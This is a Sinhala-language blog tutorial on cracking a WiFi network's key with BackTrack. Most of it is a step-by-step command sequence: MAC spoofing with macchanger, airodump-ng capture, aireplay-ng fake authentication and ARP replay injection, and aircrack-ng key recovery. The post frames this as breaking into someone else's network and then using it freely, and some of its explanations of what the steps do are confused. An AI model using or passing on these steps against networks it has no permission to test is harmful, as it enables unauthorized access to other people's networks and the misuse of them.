WIFI Password එකක් හැක් කරන්න (backtrack)...


කොහොමද යාලුවනේ ඔයාලට.ගොඩ දවසකින් මුකුත් දෙන්නත් බැරිඋනා ඔයාලට.ඔන්න අද මම දෙන්නෙ නියම පෝස්ට් එකක්.ඔයාල හැමෝම කැමති ඇතිනෙ Hacking වලට.ඔන්න මම අද දෙන්න හදන්නෙ Hacking එකක්.WIFI Password එකක් හැක් කරන්නෙ කොහොමද කියල තමයි මම අද ඔයාලට කියල දෙන්න හදන්නෙ.ඔයාලට WiFi Hack කරන්න මෙන්න මේ ටික ඕන වෙනව.

Compatible Wireless Adapter
Linax BackTrack 5r3 DVD

WiFi තියෙනම් Compatible Wireless Adapter එකක් ඔයාල ගාව තියෙනවනෙ.BackTrack 5r3 නැති කට්ටිය මෙතනින් ගිහින් අරගන්න.Virtuual Machine එකෙන් ඔයාගෙ පරිගනකට ස්තාපනය කරගන්න.ඒකට මම බාවිතා කරේ  VmWare මෘදුකාංගය.

හරි ඔන්න එහෙනම් අපි වඩේට බහිමු.ඔයාල බැක්ට්‍රැක් දාගත්තනේ.දැන්  ඔයාල Shell  Commands එකක් Open කරගන්න.ඒකෙ මේ විදානය දෙන්න.එතකොට දැනට තියන WiFi නෙට්වර්ක් මොනවද කියලා පෙන්නනවා.

airmon-ng

මෙතන පෙන්නන ra0 කියන WiFi නෙට්වර්ක්  එක උපකාර කරගෙනයි මම ඉස්සරහට  ඔයාලට හැමදේම කියන්නෙ. ඔයාලා ra0 වෙනුවට භාවිතා කරන්න ඕනේ ඔයාලට හැක් කරන්න් ඕනේ WiFi නෙට්වර්ක්  එකේ නම...

දැන් මේ විදානය දෙන්න.
 
airmon-ng stop ra0

මෙතනදි අපි කරන්නෙ හැක් කරන්න ඕනේ WiFi නෙට්වර්ක් එකේ මැක් ඇඩ්ර්ස් එක වෙනස් කරන්න.දැන් මේ විදානය දෙන්න.

ifconfig ra0 down

දැන් මේ විදානය දෙන්න.

macchanger --mac 00:11:22:33:44:55 ra0

දැන් මේ විදානය දෙන්න.

airmon-ng start ra0

මෙතනදි අපි කරන්නෙ අලුත් කරපු මැක් ඇඩ්ර්ස් එක නිවැරදි ආකාරයෙන් වැඩ කරනවද බලන එක. දැන් මේ විදානය දෙන්න.
   
airodump-ng ra0
මේකෙ BSSID Code එක Copy කරල තියාගන්න.මොකද ඉස්සරහට ඕන වෙනව.දැන් මේ විදානය දෙන්න.

airodump-ng -c (CHANNEL) -w (ESSID NAME) --bssid (BSSID NUMBER) ra0

මෙතනදි අපිට පුලුවන් අපි හැක් කරන්න යන WiFi නෙට්වර්ක් එකේ නියම නම,SSID එක හොයා ගන්න.. ඊට පස්සෙ අපිට් පුලුවන් අපි හැක් කරන්න් යන WiFi නෙට්වර්ක් එකට මේ වෙනකොට ලොග් වෙල් ඉන්න් කෙනෙක්ව හොයගන්න. දැන් මේ විදානය දෙන්න.

aireplay-ng -1 0 -a (BSSID NUMBER) -h 00:11:22:33:44:55 -e (ESSID NAME) ra0
දැන් මේ විදානය දෙන්න.

  aireplay-ng -3 -b (BSSID NUMBER) -h 00:11:22:33:44:55 ra0


දැන් මේ විදානය දෙන්න.

aircrack-ng -b (BSSID NUMBER) (ESSID NAME-01.cap)

ඔන්න KEY එක හොයා ගත්ත. දැන් ඉතින් අපිට පුලුවන් ඒ පාස් කී එක බාවිතා කරල අපිට ඕනේ විදියට නෙට්වර්ක්  එකා බාවිතා කරන්න.
Share on Google Plus

About Sachin dewthuru

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

1 comments:

  1. Ona wifi adeptor akak puluwanda...windows walata weda karana....neththam wlan0 on weddi wedakarannedda...kali linux walatath a adeptor aka weda karaida 1000 wage adeptor akak link akak denawada...

    ReplyDelete

Most Popular